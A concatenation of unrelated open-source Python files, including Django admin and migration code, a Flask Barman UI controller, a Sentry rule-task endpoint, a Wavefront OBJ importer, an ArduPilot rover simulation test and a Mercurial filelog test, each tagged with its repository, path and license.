        'inline': 'bootstrap3.renderers.InlineFieldRenderer',
    },
}
| cloudmesh/portal | old/cloudmesh_portal/settings.py | Python | apache-2.0 | 6,893 |
#-*-coding:utf-8-*-
class _AssignMixinEvent(object):
def __init__(self, request, from_employee, to_employee):
self.request = request
self.from_employee = from_employee
self.to_employee = to_employee
class AssignRun(_AssignMixinEvent):
    """Concrete assignment event; carries no payload beyond the base class."""
| mazvv/travelcrm | travelcrm/lib/events/assigns.py | Python | gpl-3.0 | 275 |
from flask import Blueprint, render_template, flash
from flask_login import login_required
from general.models import Rest
server = Blueprint('server', __name__, url_prefix='/server')
@server.route("/")
@login_required
def server_list():
rest = Rest()
list_server = rest.get_with_token('/barman/list-server')
list_return = []
if list_server.get('status_code') == 200:
list_send = list_server.get('list')
i = 0
for message in list_send:
if message != '':
message = message.split(' - ')
list_return.append({'name': message[0], 'desc': message[1], 'settings': [
{'icon': 'stats', 'target': '/server/status'}]})
i += 1
else:
flash(list_server.get('message'), 'error')
return render_template('list.html', list=list_return, panel_header='Server List',
table_header=['Name', 'Description', '#'], order=['name', 'desc', 'settings'])
@server.route("/status")
@login_required
def server_listd():
rest = Rest()
list_server = rest.get_with_token('/barman/list-server')
list_return = []
if list_server.get('status_code') == 200:
list_send = list_server.get('list')
i = 0
for message in list_send:
if message != '':
message = message.split(' - ')
list_return.append({'name': message[0], 'desc': message[1], 'settings': [
{'icon': 'stats', 'target': '/server/status'}]})
i += 1
else:
flash(list_server.get('message'), 'error')
return render_template('list.html', list=list_return, panel_header='Server List',
table_header=['Name', 'Description', '#'], order=['name', 'desc', 'settings'])
| emin100/barmanUI | barmanui/server/controllers.py | Python | gpl-3.0 | 1,807 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Allow all free-text columns of ``Problem`` to be left blank."""

    dependencies = [
        ('oj_core', '0001_initial'),
    ]

    # Each listed column is switched to a blank-allowed TextField.  The
    # generated operation list is identical (same order, same fields) to
    # spelling out one AlterField per column.
    operations = [
        migrations.AlterField(
            model_name='problem',
            name=column,
            field=models.TextField(blank=True),
        )
        for column in (
            'background',
            'description',
            'hint',
            'input',
            'output',
            'sample_input',
            'sample_output',
            'source',
            'time_limitation',
        )
    ]
| oj-development/oj-web | oj_core/migrations/0002_auto_20150821_0113.py | Python | mit | 1,625 |
# Copyright (C) 2011-2015 2ndQuadrant Italia (Devise.IT S.r.L.)
#
# This file is part of Barman.
#
# Barman is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Barman is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Barman. If not, see <http://www.gnu.org/licenses/>.
"""
The main Barman module
"""
from __future__ import absolute_import
from .version import __version__
# Placeholder for the global configuration object (None until initialised
# elsewhere at runtime — TODO confirm which module populates it).
__config__ = None
| xocolatl/pgbarman | barman/__init__.py | Python | gpl-3.0 | 838 |
from django.core import urlresolvers
from django.contrib import admin
from django.template import defaultfilters
from .. import models
# Helpers ##########
class ModelAdmin(admin.ModelAdmin):
    """ deletion of top level objects is evil """
    def has_delete_permission(self, request, obj=None):
        # Never allow deleting top-level records through the admin.
        return False
class ReadOnlyTabularInline(admin.TabularInline):
    # Inline whose rows can neither be added nor deleted.
    def has_add_permission(self, request):
        return False
    can_delete = False
class IdentifierInline(admin.TabularInline):
    # Generic inline for identifier rows; subclasses set ``model``.
    fields = ('identifier', 'scheme')
    extra = 0
class LinkInline(admin.TabularInline):
    # Generic inline for URL/note rows; subclasses set ``model``.
    fields = ('url', 'note')
    extra = 0
class ContactDetailInline(admin.TabularInline):
    # Generic inline for contact-detail rows; subclasses set ``model``.
    fields = ('type', 'value', 'note', 'label')
    extra = 0
class OtherNameInline(admin.TabularInline):
    # Generic inline for alternate-name rows; subclasses set ``model``.
    fields = ('name', 'note', 'start_date', 'end_date')
    extra = 0
#class MimetypeLinkInline(admin.TabularInline):
# fields = ('media_type', 'url')
#class RelatedEntityInline(admin.TabularInline):
# fields = ('name', 'entity_type', 'organization', 'person')
# Divisions & Jurisdictions ##########
@admin.register(models.Division)
class DivisionAdmin(ModelAdmin):
    # Divisions are shown read-only: every field is listed in both
    # ``fields`` and ``readonly_fields``.
    list_display = ('name', 'id')
    search_fields = list_display
    fields = readonly_fields = ('id', 'name', 'redirect', 'country')
class LegislativeSessionInline(ReadOnlyTabularInline):
    model = models.LegislativeSession
    readonly_fields = ('identifier', 'name', 'classification')
@admin.register(models.Jurisdiction)
class JurisdictionAdmin(ModelAdmin):
    # Jurisdictions are read-only; their sessions are listed inline.
    list_display = ('name', 'id')
    readonly_fields = fields = ('id', 'name', 'classification', 'url', 'division', 'feature_flags',
                                'extras')
    inlines = [LegislativeSessionInline]
# Organizations and Posts #############
# Organization-specific inlines: each just binds a model to one of the
# generic inline bases defined above.
class OrganizationIdentifierInline(IdentifierInline):
    model = models.OrganizationIdentifier
class OrganizationNameInline(OtherNameInline):
    model = models.OrganizationName
class OrganizationContactDetailInline(ContactDetailInline):
    model = models.OrganizationContactDetail
class OrganizationLinkInline(LinkInline):
    model = models.OrganizationLink
class OrganizationSourceInline(LinkInline):
    model = models.OrganizationSource
class PostInline(admin.TabularInline):
    """ a read-only inline for posts here, with links to the real thing """
    model = models.Post
    extra = 0
    fields = readonly_fields = ('label', 'role')
    ordering = ('label',)
    can_delete = False
    show_change_link = True # Django 1.8? (attribute introduced in 1.8)
@admin.register(models.Organization)
class OrganizationAdmin(ModelAdmin):
    # Structural/imported fields are read-only; name, dates and image
    # remain editable.
    readonly_fields = ('id', 'classification', 'parent', 'jurisdiction', 'extras')
    fields = (
        'name', 'jurisdiction', 'id', 'classification',
        'parent', ('founding_date', 'dissolution_date'),
        'image', 'extras')
    list_display = ('name', 'jurisdiction', 'classification')
    list_select_related = ('jurisdiction',)
    inlines = [
        OrganizationIdentifierInline,
        OrganizationNameInline,
        OrganizationContactDetailInline,
        OrganizationLinkInline,
        OrganizationSourceInline,
        PostInline
    ]
class PostContactDetailInline(ContactDetailInline):
    model = models.PostContactDetail
class PostLinkInline(LinkInline):
    model = models.PostLink
@admin.register(models.Post)
class PostAdmin(ModelAdmin):
    # Everything except the start/end dates is read-only.
    readonly_fields = ('id', 'label', 'organization', 'division', 'extras', 'role')
    fields = readonly_fields + (('start_date', 'end_date'), )
    list_display = ('label', 'organization', 'division')
    inlines = [
        PostContactDetailInline,
        PostLinkInline,
    ]
### People & Memberships #######
# Person-specific inlines bound to the generic bases above.
class PersonIdentifierInline(IdentifierInline):
    model = models.PersonIdentifier
class PersonNameInline(OtherNameInline):
    model = models.PersonName
class PersonContactDetailInline(ContactDetailInline):
    model = models.PersonContactDetail
class PersonLinkInline(LinkInline):
    model = models.PersonLink
class PersonSourceInline(LinkInline):
    model = models.PersonSource
class MembershipInline(ReadOnlyTabularInline):
    # Read-only list of a person's memberships.
    model = models.Membership
    readonly_fields = ('organization', 'post')
    fields = ('organization', 'post', 'label', 'role', 'start_date', 'end_date')
    extra = 0
    can_delete = False
@admin.register(models.Person)
class PersonAdmin(ModelAdmin):
    """Admin for people; identifiers, names, contacts, links, sources and
    memberships are shown inline, and a membership summary appears on the
    changelist."""
    search_fields = ['name']
    readonly_fields = ('id', 'name', 'extras')
    fields = (
        'name', 'id', 'image',
        ('birth_date', 'death_date'),
        ('gender', 'national_identity', 'sort_name', 'summary'),
        'biography', 'extras',
    )
    inlines = [
        PersonIdentifierInline,
        PersonNameInline,
        PersonContactDetailInline,
        PersonLinkInline,
        PersonSourceInline,
        MembershipInline
    ]
    def get_memberships(self, obj):
        """Changelist column: HTML listing up to five memberships.

        Anything past the first five is summarised as "And N more".
        """
        memberships = obj.memberships.select_related('organization__jurisdiction')
        html = []
        SHOW_N = 5
        for memb in memberships[:SHOW_N]:
            # The change-form URL is intentionally blank for now; the
            # reverse() call is disabled.  (Bug fix: removed the dead
            # ``info = (app_label, memb._meta.module_name)`` line — its
            # result was unused and ``_meta.module_name`` was deprecated in
            # Django 1.8 and removed in 1.10.)
            admin_url = ''  # urlresolvers.reverse('admin:%s_%s_change' % info, args=(memb.pk,))
            tmpl = '<a href="%s">%s %s</a>\n'
            html.append(tmpl % (
                admin_url,
                memb.organization.jurisdiction.name if memb.organization.jurisdiction else '',
                memb.organization.name))
        more = len(memberships) - SHOW_N
        if more > 0:
            html.append('And %d more' % more)
        return '<br/>'.join(html)
    get_memberships.short_description = 'Memberships'
    get_memberships.allow_tags = True
    # NOTE(review): 'memberships' is a reverse relation, which
    # select_related() cannot follow; Django 1.8+ raises FieldError on the
    # changelist for it.  prefetch_related() via get_queryset() would be
    # the proper replacement — TODO confirm the target Django version.
    list_select_related = ('memberships',)
    list_display = ('name', 'id', 'get_memberships')
# Membership inlines are additionally read-only (no add/delete).
class MembershipContactDetailInline(ContactDetailInline, ReadOnlyTabularInline):
    model = models.MembershipContactDetail
class MembershipLinkInline(LinkInline, ReadOnlyTabularInline):
    model = models.MembershipLink
@admin.register(models.Membership)
class MembershipAdmin(ModelAdmin):
    # Related objects are fixed; only role/label/dates stay editable.
    readonly_fields = ('organization', 'person', 'post', 'on_behalf_of', 'extras')
    list_display = ('organization', 'person', 'post', 'on_behalf_of',
                    'label', 'role', 'start_date', 'end_date',)
    fields = ('organization', 'person', 'role', 'post', 'label', 'on_behalf_of',
              ('start_date', 'end_date'), 'extras')
    list_select_related = ('post', 'person', 'organization', 'on_behalf_of')
    inlines = [
        MembershipContactDetailInline,
        MembershipLinkInline,
    ]
# Bills ################
# Read-only inlines for a bill's related records.
class BillAbstractInline(ReadOnlyTabularInline):
    model = models.BillAbstract
    readonly_fields = ('abstract', 'note')
    can_delete = False
class BillTitleInline(ReadOnlyTabularInline):
    model = models.BillTitle
    readonly_fields = ('title', 'note')
    can_delete = False
class BillIdentifierInline(IdentifierInline):
    model = models.BillIdentifier
class BillActionInline(ReadOnlyTabularInline):
    model = models.BillAction
    readonly_fields = ('date', 'organization', 'description')
    fields = ('date', 'description', 'organization')
    ordering = ('date',)
# TODO: BillActionRelatedEntity
# TODO: RelatedBill
class BillSponsorshipInline(ReadOnlyTabularInline):
    model = models.BillSponsorship
    readonly_fields = fields = ('name', 'primary', 'classification')
    extra = 0
# TODO: Document & Version
class BillSourceInline(ReadOnlyTabularInline):
    readonly_fields = ('url', 'note')
    model = models.BillSource
@admin.register(models.Bill)
class BillAdmin(admin.ModelAdmin):
    """Read-only admin for bills; related records are shown inline and the
    changelist carries several computed columns."""
    readonly_fields = fields = (
        'identifier', 'legislative_session', 'classification',
        'from_organization', 'title', 'id', 'extras')
    search_fields = ['identifier', 'title']
    # NOTE(review): 'sources' is a reverse relation, which select_related()
    # cannot follow; Django 1.8+ raises FieldError for it on the
    # changelist.  The two session-related entries are fine — TODO confirm
    # the target Django version.
    list_select_related = (
        'sources',
        'legislative_session',
        'legislative_session__jurisdiction',
    )
    inlines = [
        BillAbstractInline,
        BillTitleInline,
        BillIdentifierInline,
        BillActionInline,
        BillSponsorshipInline,
        BillSourceInline,
    ]
    def get_jurisdiction_name(self, obj):
        """Changelist column: name of the bill's jurisdiction."""
        return obj.legislative_session.jurisdiction.name
    get_jurisdiction_name.short_description = 'Jurisdiction'
    def get_session_name(self, obj):
        """Changelist column: name of the bill's legislative session."""
        return obj.legislative_session.name
    get_session_name.short_description = 'Session'
    def source_link(self, obj):
        """Changelist column linking to the 'legislationdetail' source.

        Bug fix: the original used .get(), which raised DoesNotExist or
        MultipleObjectsReturned — breaking the whole changelist — for bills
        with zero or several matching sources.  .first() degrades to an
        empty cell instead.
        """
        source = obj.sources.filter(url__icontains="legislationdetail").first()
        if source is None:
            return ''
        tmpl = u'<a href="{0}" target="_blank">View source</a>'
        return tmpl.format(source.url)
    source_link.short_description = 'View source'
    source_link.allow_tags = True
    def get_truncated_sponsors(self, obj):
        """Changelist column: up to five sponsor names, cut at 10 words."""
        spons = ', '.join(s.name for s in obj.sponsorships.all()[:5])
        return defaultfilters.truncatewords(spons, 10)
    get_truncated_sponsors.short_description = 'Sponsors'
    def get_truncated_title(self, obj):
        """Changelist column: bill title cut at 25 words."""
        return defaultfilters.truncatewords(obj.title, 25)
    get_truncated_title.short_description = 'Title'
    list_display = (
        'identifier', 'get_jurisdiction_name',
        'get_session_name', 'get_truncated_sponsors',
        'get_truncated_title', 'source_link')
    list_filter = ('legislative_session__jurisdiction__name',)
| rshorey/python-opencivicdata-django | opencivicdata/admin/__init__.py | Python | bsd-3-clause | 9,394 |
from __future__ import absolute_import
from django.http import Http404
from rest_framework.response import Response
from sentry.api.bases.project import ProjectEndpoint, ProjectSettingPermission
from sentry.api.serializers import serialize
from sentry.integrations.slack import tasks
from sentry.models import Rule, RuleStatus
class ProjectRuleTaskDetailsEndpoint(ProjectEndpoint):
    """Poll the state of an asynchronous rule creation/update task."""

    permission_classes = [ProjectSettingPermission]

    def get(self, request, project, task_uuid):
        """Report the async task's status.

        Response shape: ``{"status": ..., "rule": ..., "error": ...}`` —
        ``rule`` is the serialized rule for a successful task, ``error``
        the failure message for a failed one; while pending both are None.
        Raises 404 if a "successful" task references a missing rule.
        """
        task_state = tasks.RedisRuleStatus(task_uuid).get_value()
        status = task_state["status"]
        payload = {"status": status, "rule": None, "error": None}
        rule_id = task_state.get("rule_id")
        if status == "success" and rule_id:
            try:
                rule = Rule.objects.get(
                    project=project,
                    id=int(rule_id),
                    status__in=[RuleStatus.ACTIVE, RuleStatus.INACTIVE],
                )
            except Rule.DoesNotExist:
                raise Http404
            payload["rule"] = serialize(rule, request.user)
        elif status == "failed":
            payload["error"] = task_state.get("error")
        return Response(payload, status=200)
| beeftornado/sentry | src/sentry/api/endpoints/project_rule_task_details.py | Python | bsd-3-clause | 1,470 |
#-*- coding: utf-8 -*-
# Contains implementation of Wavefront .OBJ importer
# Copyright (c) 2014 Tomasz Kapuściński
import re
import modelformat
import geometry
class ObjFormat(modelformat.ModelFormat):
    """Importer/exporter for the Wavefront .OBJ model format.

    Reading resolves v/vt/vn indices into triangles (polygons are
    triangulated); writing deduplicates vertex attributes and emits a
    companion .MTL material library.
    """
    def __init__(self):
        self.description = 'Wavefront .OBJ format'
    def get_extension(self):
        # Filename extension (without the dot) handled by this format.
        return 'obj'
    def read(self, filename, model, params):
        """Read *filename* into *model*; returns True on success.

        Recognised params: flipX / flipY / flipZ mirror that axis; when an
        odd number of axes is mirrored the triangle winding is reversed so
        faces keep their orientation.
        """
        # lists with parsed vertex attributes
        vertex_coords = []
        tex_coords = []
        normals = []
        materials = {}
        # read file
        input_file = open(filename, 'r')
        flipX = 1.0
        flipY = 1.0
        flipZ = 1.0
        if modelformat.get_param(params, 'flipX') != None: flipX = -1.0
        if modelformat.get_param(params, 'flipY') != None: flipY = -1.0
        if modelformat.get_param(params, 'flipZ') != None: flipZ = -1.0
        # An odd number of mirrored axes inverts the polygon winding.
        flipOrder = (flipX * flipY * flipZ) < 0
        # parse lines
        while True:
            line = input_file.readline()
            if len(line) == 0:
                break   # EOF
            if line[len(line)-1] == '\n':
                line = line[:len(line)-1]
            parts = line.split(' ')
            if parts[0] == 'mtllib':
                # external material library
                name = parts[1]
                materials = read_mtl_file(name)
            elif parts[0] == 'v':
                vertex_coords.append(geometry.VertexCoord(flipX * float(parts[1]), flipY * float(parts[2]), flipZ * float(parts[3])))
            elif parts[0] == 'vt':
                # OBJ texture coordinates use a bottom-left origin; flip V.
                tex_coords.append(geometry.TexCoord(float(parts[1]), 1 - float(parts[2])))
            elif parts[0] == 'vn':
                normals.append(geometry.Normal(flipX * float(parts[1]), flipY * float(parts[2]), flipZ * float(parts[3])))
            elif parts[0] == 'usemtl':
                current_material = materials[parts[1]]
            elif parts[0] == 'f':
                polygon = []
                # parse vertices: "v/vt/vn" with 1-based indices; vt may be empty
                for i in range(1, len(parts)):
                    elements = parts[i].split('/')
                    vert_coord = vertex_coords[int(elements[0]) - 1]
                    normal = normals[int(elements[2]) - 1]
                    if elements[1] == '':
                        tex_coord = geometry.TexCoord(0.0, 0.0)
                    else:
                        tex_coord = tex_coords[int(elements[1]) - 1]
                    polygon.append(geometry.Vertex(vert_coord, normal, tex_coord))
                # triangulate polygon
                new_triangles = geometry.triangulate(polygon, flipOrder)
                # save vertices
                for triangle in new_triangles:
                    triangle.material = current_material
                    model.triangles.append(triangle)
        input_file.close()
        return True
    def write(self, filename, model, params):
        """Write *model* to *filename* and its materials to a .MTL file.

        Same flipX/flipY/flipZ params as read().  Returns True on success.
        """
        model_file = open(filename, 'w')
        # Derive the material-library name.  Bug fix: the original used
        # "if materials_filename.find('.obj'):", which tests an index (and
        # is truthy even when '.obj' is absent), so a filename starting
        # with '.obj' skipped the rename and the materials clobbered the
        # model file itself.
        if filename.endswith('.obj'):
            materials_filename = filename[:-len('.obj')] + '.mtl'
        else:
            materials_filename = filename + '.mtl'
        materials_file = open(materials_filename, 'w')
        materials = []          # unique materials, in order of first use
        vertex_coords = []      # deduplicated attribute pools
        tex_coords = []
        normals = []
        faces = []              # per face: list of [v_idx, vt_idx, vn_idx, mat_name]
        flipX = 1.0
        flipY = 1.0
        flipZ = 1.0
        if modelformat.get_param(params, 'flipX') != None: flipX = -1.0
        if modelformat.get_param(params, 'flipY') != None: flipY = -1.0
        if modelformat.get_param(params, 'flipZ') != None: flipZ = -1.0
        flipOrder = (flipX * flipY * flipZ) < 0
        materials_file.write('# Materials\n')
        for triangle in model.triangles:
            mat = triangle.material
            if triangle.material not in materials:
                # First time this material is seen: name it and emit its
                # .MTL entry (state flags are encoded into the name).
                materials.append(mat)
                name = 'Material_{}_[{}]'.format(len(materials), geometry.decode_state(mat.state))
                mat.name = name
                materials_file.write('\n')
                materials_file.write('newmtl {}\n'.format(name))
                if mat.texture != '':
                    materials_file.write('map_Kd {}\n'.format(mat.texture))
                materials_file.write('Ns 96.078431\n')
                materials_file.write('Ka {} {} {}\n'.format(mat.ambient[0], mat.ambient[1], mat.ambient[2]))
                materials_file.write('Kd {} {} {}\n'.format(mat.diffuse[0], mat.diffuse[1], mat.diffuse[2]))
                materials_file.write('Ks {} {} {}\n'.format(mat.specular[0], mat.specular[1], mat.specular[2]))
                materials_file.write('Ni 1.000000\n')
                materials_file.write('d 1.000000\n')
                materials_file.write('illum 2\n')
            else:
                # Reuse the stored equal material so mat.name is defined.
                for mater in materials:
                    if mat == mater:
                        mat = mater
            face = []
            for vertex in triangle.vertices:
                vertex_coord = geometry.VertexCoord(vertex.x, vertex.y, vertex.z)
                tex_coord = geometry.TexCoord(vertex.u1, vertex.v1)
                normal = geometry.Normal(vertex.nx, vertex.ny, vertex.nz)
                # looking for vertex coordinate (linear dedup)
                vertex_coord_index = -1
                for i in range(len(vertex_coords)):
                    if vertex_coord == vertex_coords[i]:
                        vertex_coord_index = i
                if vertex_coord_index == -1:
                    vertex_coord_index = len(vertex_coords)
                    vertex_coords.append(vertex_coord)
                # looking for texture coordinate
                tex_coord_index = -1
                for i in range(len(tex_coords)):
                    if tex_coord == tex_coords[i]:
                        tex_coord_index = i
                if tex_coord_index == -1:
                    tex_coord_index = len(tex_coords)
                    tex_coords.append(tex_coord)
                # looking for normal
                normal_index = -1
                for i in range(len(normals)):
                    if normal == normals[i]:
                        normal_index = i
                if normal_index == -1:
                    normal_index = len(normals)
                    normals.append(normal)
                for mat in materials:
                    if mat == triangle.material:
                        mat_name = mat.name
                vertex_indices = [ vertex_coord_index + 1, tex_coord_index + 1, normal_index + 1, mat_name ]
                face.append(vertex_indices)
            faces.append(face)
        # write vertex coordinates
        model_file.write('mtllib {}\n'.format(materials_filename))
        for v in vertex_coords:
            model_file.write('v {} {} {}\n'.format(flipX * v.x, flipY * v.y, flipZ * v.z))
        for t in tex_coords:
            model_file.write('vt {} {}\n'.format(t.u, t.v))
        for n in normals:
            model_file.write('vn {} {} {}\n'.format(flipX * n.x, flipY * n.y, flipZ * n.z))
        mat_name = ''
        model_file.write('s off\n')
        # write faces, emitting usemtl whenever the material changes
        for f in faces:
            name = f[0][3]
            if name != mat_name:
                model_file.write('usemtl {}\n'.format(name))
                mat_name = name
            model_file.write('f')
            if flipOrder:
                # reversed winding: emit vertices 0, 2, 1
                model_file.write(' {}/{}/{}'.format(f[0][0], f[0][1], f[0][2]))
                model_file.write(' {}/{}/{}'.format(f[2][0], f[2][1], f[2][2]))
                model_file.write(' {}/{}/{}'.format(f[1][0], f[1][1], f[1][2]))
            else:
                for v in f:
                    model_file.write(' {}/{}/{}'.format(v[0], v[1], v[2]))
            model_file.write('\n')
        model_file.close()
        materials_file.close()
        return True
# Register this handler and its file extension with the format framework.
modelformat.register_format('obj', ObjFormat())
modelformat.register_extension('obj', 'obj')
# state regex pattern: matches a trailing "[state]" suffix in a material
# name, e.g. "Material_1_[flags]"; group 2 captures the state text.
state_pattern = re.compile(r'^.+(\[(.+?)\])$')
# reads Wavefront .MTL material file
def read_mtl_file(filename):
    """Parse a Wavefront .MTL material library.

    Returns a dict mapping material name -> geometry.Material.  A name of
    the form "Something[state]" has the bracketed part decoded into the
    material's state flags via geometry.encode_state().
    """
    materials = {}
    current = None
    with open(filename, 'r') as mtl_file:
        for raw_line in mtl_file:
            line = raw_line.rstrip('\n')
            fields = line.split(' ')
            keyword = fields[0]
            if keyword == 'newmtl':
                current = geometry.Material()
                match = state_pattern.match(fields[1])
                if match is not None:
                    current.state = geometry.encode_state(match.group(2))
                materials[fields[1]] = current
            elif keyword == 'Ka':
                for idx in range(3):
                    current.ambient[idx] = float(fields[idx + 1])
            elif keyword == 'Kd':
                for idx in range(3):
                    current.diffuse[idx] = float(fields[idx + 1])
            elif keyword == 'Ks':
                for idx in range(3):
                    current.specular[idx] = float(fields[idx + 1])
            elif keyword == 'map_Kd':
                current.texture = fields[1]
    return materials
| tomaszkax86/Colobot-Model-Converter | objformat.py | Python | bsd-2-clause | 9,215 |
import cPickle as pickle
import sys
def main():
    """Collect the set of relation types from a WordNet edge CSV.

    Usage: relsSet.py [edges_csv]   (default: ../wordnet/WNedges.csv)

    The input is tab-separated with a header row; the third column holds
    the quoted relation type.  The resulting set is pickled to
    ../wordnet/relsSet.p.
    """
    numargs = len(sys.argv)
    if numargs == 2:
        fname = sys.argv[1]
    else:
        fname = "../wordnet/WNedges.csv"
    relsSet = set()
    with open(fname, "r") as f:
        for idx, line in enumerate(f):
            if idx == 0:
                # skip the header row
                continue
            # third tab-separated field, trailing newline and the
            # surrounding quote characters removed
            relType = line[0:-1].split('\t')[2][1:-1]
            relsSet.add(relType)
    # Bug fix: the original never closed the output handle; also removed
    # the unused ``w = None`` local.
    with open("../wordnet/relsSet.p", "wb") as out:
        pickle.dump(relsSet, out)
if __name__ == "__main__":
    main()
# drive APMrover2 in SITL
import util, pexpect, sys, time, math, shutil, os
from common import *
from pymavlink import mavutil
import random
# get location of scripts
testdir=os.path.dirname(os.path.realpath(__file__))
#HOME=mavutil.location(-35.362938,149.165085,584,270)
# Simulated home position: latitude, longitude, altitude (m), heading (deg).
HOME=mavutil.location(40.071374969556928,-105.22978898137808,1583.702759,246)
# Filled in from the first GPS fix once the simulator is running.
homeloc = None
def arm_rover(mavproxy, mav):
    '''arm the rover's throttle, waiting first for the EKF to settle'''
    # wait for EKF to settle
    wait_seconds(mav, 15)
    mavproxy.send('arm throttle\n')
    mavproxy.expect('ARMED')
    print("ROVER ARMED")
    return True
def drive_left_circuit(mavproxy, mav):
    '''drive a left circuit, 50m on a side'''
    mavproxy.send('switch 6\n')
    wait_mode(mav, 'MANUAL')
    # full throttle
    mavproxy.send('rc 3 2000\n')
    print("Driving left circuit")
    # do 4 turns
    for i in range(0,4):
        # hard left
        print("Starting turn %u" % i)
        mavproxy.send('rc 1 1000\n')
        # headings step 270 -> 180 -> 90 -> 0 driving anticlockwise
        if not wait_heading(mav, 270 - (90*i), accuracy=10):
            return False
        # centre the steering and drive one 50m leg
        mavproxy.send('rc 1 1500\n')
        print("Starting leg %u" % i)
        if not wait_distance(mav, 50, accuracy=7):
            return False
    # throttle back to neutral
    mavproxy.send('rc 3 1500\n')
    print("Circuit complete")
    return True
def drive_RTL(mavproxy, mav):
    '''drive to home'''
    print("Driving home in RTL")
    # switch position 3 selects RTL mode
    mavproxy.send('switch 3\n')
    if not wait_location(mav, homeloc, accuracy=22, timeout=90):
        return False
    print("RTL Complete")
    return True
def setup_rc(mavproxy):
    '''setup RC override control'''
    # Centre channels 1-7, then raise channel 8 (mode switch) to 1800.
    for chan in range(1, 8):
        mavproxy.send('rc %u 1500\n' % chan)
    mavproxy.send('rc 8 1800\n')
def drive_mission(mavproxy, mav, filename):
    '''drive a mission from a file'''
    global homeloc
    print("Driving mission %s" % filename)
    mavproxy.send('wp load %s\n' % filename)
    mavproxy.expect('Flight plan received')
    mavproxy.send('wp list\n')
    mavproxy.expect('Requesting [0-9]+ waypoints')
    mavproxy.send('switch 4\n') # auto mode
    mavproxy.send('rc 3 1500\n')
    wait_mode(mav, 'AUTO')
    # expect waypoints 1..4 to be reached within 5m each
    if not wait_waypoint(mav, 1, 4, max_dist=5):
        return False
    # the mission ends by switching to HOLD
    wait_mode(mav, 'HOLD')
    print("Mission OK")
    return True
def drive_APMrover2(viewerip=None, map=False):
'''drive APMrover2 in SIL
you can pass viewerip as an IP address to optionally send fg and
mavproxy packets too for local viewing of the mission in real time
'''
global homeloc
options = '--sitl=127.0.0.1:5501 --out=127.0.0.1:19550 --streamrate=10'
if viewerip:
options += " --out=%s:14550" % viewerip
if map:
options += ' --map'
home = "%f,%f,%u,%u" % (HOME.lat, HOME.lng, HOME.alt, HOME.heading)
sil = util.start_SIL('APMrover2', wipe=True, model='rover', home=home, speedup=10)
mavproxy = util.start_MAVProxy_SIL('APMrover2', options=options)
print("WAITING FOR PARAMETERS")
mavproxy.expect('Received [0-9]+ parameters')
# setup test parameters
mavproxy.send("param load %s/Rover.parm\n" % testdir)
mavproxy.expect('Loaded [0-9]+ parameters')
# restart with new parms
util.pexpect_close(mavproxy)
util.pexpect_close(sil)
sil = util.start_SIL('APMrover2', model='rover', home=home, speedup=10)
mavproxy = util.start_MAVProxy_SIL('APMrover2', options=options)
mavproxy.expect('Telemetry log: (\S+)')
logfile = mavproxy.match.group(1)
print("LOGFILE %s" % logfile)
buildlog = util.reltopdir("../buildlogs/APMrover2-test.tlog")
print("buildlog=%s" % buildlog)
if os.path.exists(buildlog):
os.unlink(buildlog)
try:
os.link(logfile, buildlog)
except Exception:
pass
mavproxy.expect('Received [0-9]+ parameters')
util.expect_setup_callback(mavproxy, expect_callback)
expect_list_clear()
expect_list_extend([sil, mavproxy])
print("Started simulator")
# get a mavlink connection going
try:
mav = mavutil.mavlink_connection('127.0.0.1:19550', robust_parsing=True)
except Exception, msg:
print("Failed to start mavlink connection on 127.0.0.1:19550" % msg)
raise
mav.message_hooks.append(message_hook)
mav.idle_hooks.append(idle_hook)
failed = False
e = 'None'
try:
print("Waiting for a heartbeat with mavlink protocol %s" % mav.WIRE_PROTOCOL_VERSION)
mav.wait_heartbeat()
print("Setting up RC parameters")
setup_rc(mavproxy)
print("Waiting for GPS fix")
mav.wait_gps_fix()
homeloc = mav.location()
print("Home location: %s" % homeloc)
if not arm_rover(mavproxy, mav):
print("Failed to ARM")
failed = True
if not drive_mission(mavproxy, mav, os.path.join(testdir, "rover1.txt")):
print("Failed mission")
failed = True
if not log_download(mavproxy, mav, util.reltopdir("../buildlogs/APMrover2-log.bin")):
print("Failed log download")
failed = True
# if not drive_left_circuit(mavproxy, mav):
# print("Failed left circuit")
# failed = True
# if not drive_RTL(mavproxy, mav):
# print("Failed RTL")
# failed = True
except pexpect.TIMEOUT, e:
print("Failed with timeout")
failed = True
mav.close()
util.pexpect_close(mavproxy)
util.pexpect_close(sil)
if os.path.exists('APMrover2-valgrind.log'):
os.chmod('APMrover2-valgrind.log', 0644)
shutil.copy("APMrover2-valgrind.log", util.reltopdir("../buildlogs/APMrover2-valgrind.log"))
if failed:
print("FAILED: %s" % e)
return False
return True
| flyngPig/APM_simulink | ardupilot/Tools/autotest/apmrover2.py | Python | gpl-3.0 | 5,678 |
#!/usr/bin/env python
"""
Tests the behaviour of filelog w.r.t. data starting with '\1\n'
"""
from mercurial import ui, hg
from mercurial.node import nullid, hex
# Create a fresh repository in the current directory and open the
# filelog (revlog) for a file named 'foobar'.
myui = ui.ui()
repo = hg.repository(myui, path='.', create=True)
fl = repo.file('foobar')
def addrev(text, renamed=False):
    """Add *text* as a new filelog revision and return its node.

    With renamed=True a dummy copy/copyrev metadata pair is stored so that
    filelog.renamed() reports the revision as a rename.
    """
    if renamed:
        # data doesn't matter. Just make sure filelog.renamed() returns True
        meta = dict(copyrev=hex(nullid), copy='bar')
    else:
        meta = {}
    lock = t = None
    try:
        lock = repo.lock()
        t = repo.transaction('commit')
        node = fl.add(text, meta, t, 0, nullid, nullid)
        return node
    finally:
        # close/release in reverse acquisition order; guard against a
        # failure before either was obtained
        if t:
            t.close()
        if lock:
            lock.release()
def error(text):
    # Python 2 print statement: this script targets Mercurial's py2 test runner.
    print 'ERROR: ' + text
# Data beginning with '\1\n' collides with the revlog metadata marker;
# these checks exercise read/cmp/size with and without a rename.
textwith = '\1\nfoo'
without = 'foo'
node = addrev(textwith)
if not textwith == fl.read(node):
    error('filelog.read for data starting with \\1\\n')
if fl.cmp(node, textwith) or not fl.cmp(node, without):
    error('filelog.cmp for data starting with \\1\\n')
if fl.size(0) != len(textwith):
    error('FIXME: This is a known failure of filelog.size for data starting '
          'with \\1\\n')
